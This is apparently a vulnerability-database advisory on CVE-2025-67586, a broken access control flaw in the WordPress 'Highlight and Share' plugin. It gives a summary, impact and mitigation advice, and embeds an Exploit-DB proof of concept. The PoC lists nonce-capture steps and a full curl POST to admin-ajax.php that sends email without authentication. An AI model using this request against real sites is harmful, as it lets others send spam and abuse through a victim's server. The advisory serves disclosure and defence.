WordPress Plugin 5.2.0 - Broken Access Control
A broken access control vulnerability exists in the WordPress plugin 'Highlight and Share' version 5.2.0 and earlier. The vulnerability allows unauthenticated attackers to abuse the 'Share via Email' AJAX functionality by reusing a valid post nonce to send unauthorized emails. This can lead to email spam or abuse without requiring user authentication. The exploit requires no privileges and can be executed by capturing a valid nonce from a public post and then sending crafted POST requests to the plugin's AJAX endpoint. No official patch or vendor advisory is provided in the available data.
AI Analysis
Technical Summary
The WordPress plugin 'Highlight and Share' (version 5.2.0 and earlier) contains a broken access control vulnerability (CVE-2025-67586) in its AJAX 'Share via Email' feature. An unauthenticated attacker can reuse a valid post nonce obtained from a public post to trigger email sharing requests without proper permission checks. This allows unauthorized sending of emails through the plugin's functionality, potentially enabling email spam or abuse. The vulnerability requires no authentication or privileges and is demonstrated with a proof-of-concept exploit consisting of curl commands; the exploit database entry lists the code language as Perl. No patch or official vendor advisory is currently available.
Potential Impact
The vulnerability enables unauthenticated attackers to send emails via the affected WordPress plugin without authorization. This can result in abuse such as spam emails being sent from the vulnerable site, potentially damaging the site's reputation and causing operational issues. There is no indication of direct compromise of site data or code execution from the provided information.
Mitigation Recommendations
Patch status is not confirmed in the available data; check the vendor for current remediation guidance. Until a patch is available, site administrators should consider disabling or restricting the affected plugin's email sharing functionality, or adding server-side permission checks so that the AJAX action cannot be triggered by unauthenticated requests. Monitoring for unusual outbound email activity originating from the plugin is also advisable.
Indicators of Compromise
- exploit-code:

# Exploit Title: WordPress Plugin 5.2.0 - Broken Access Control
# Date: 2025-09-20
# Exploit Author: Zeeshan Haider
# Vendor Homepage: https://wordpress.org/plugins/
# Software Link: https://wordpress.org/plugins/highlight-and-share/
# Version: <= 5.2.0 (REQUIRED)
# Tested on: WordPress 6.x, Kali Linux
# CVE: CVE-2025-67586

==> Description
A broken access control vulnerability exists in a WordPress plugin developed by DLX Plugins. The plugin exposes an unauthenticated AJAX action that allows attackers to abuse the "Share via Email" functionality without proper permission checks. An unauthenticated attacker can reuse a valid post nonce to trigger email sharing requests, leading to unauthorized email sending (email spam / abuse) without user authentication.

==> Privileges Required
None (Unauthenticated)

==> Proof of Concept (PoC)
> Step 1: Pick website with Installed Plugin
> Step 2: Obtain a Valid Nonce
1. Open a public post.
2. Highlight text and click **Share via Email**.
3. Open Developer Tools → Network → XHR.
4. Send the email once.
5. Capture the request containing:
   action=has_email_social_modal
   nonce=<NONCE>
   post_id=<POSTID>
> Step 3: Exploit via Unauthenticated Request
> bash cmd: (replace website URL, post URL, and nonce)

curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php' \
  -d 'action=has_email_form_submission' \
  -d 'formData[postId]=<POSTID>' \
  -d 'formData[permalink]=http://localhost/?p=<POSTID>' \
  -d 'formData[nonce]=<NONCE>' \
  -d 'formData[toEmail]=attacker@example.com' \
  -d 'formData[subject]=PoC' \
  -d 'formData[shareText]=POC test' \
  -d 'formData[emailShareType]=selection' \
  --compressed

--> Expected JSON response:
{
  "success": true,
  "data": {
    "errors": false,
    "message_title": "This post has been shared!",
    "message_body": "You have shared this post with attacker@example.com",
    "message_subject": "[Shared Post] <POST TITLE>",
    "message_source_name": "Site Name",
    "message_source_email": "site@example.com"
  }
}
Technical Details
- EDB ID: 52511
- Has exploit code: true
- Code language: perl
Threat ID: 69ec2f5087115cfb68b9e9d7
Added to database: 4/25/2026, 3:04:48 AM
Last enriched: 4/25/2026, 3:04:59 AM
Last updated: 4/25/2026, 8:25:09 AM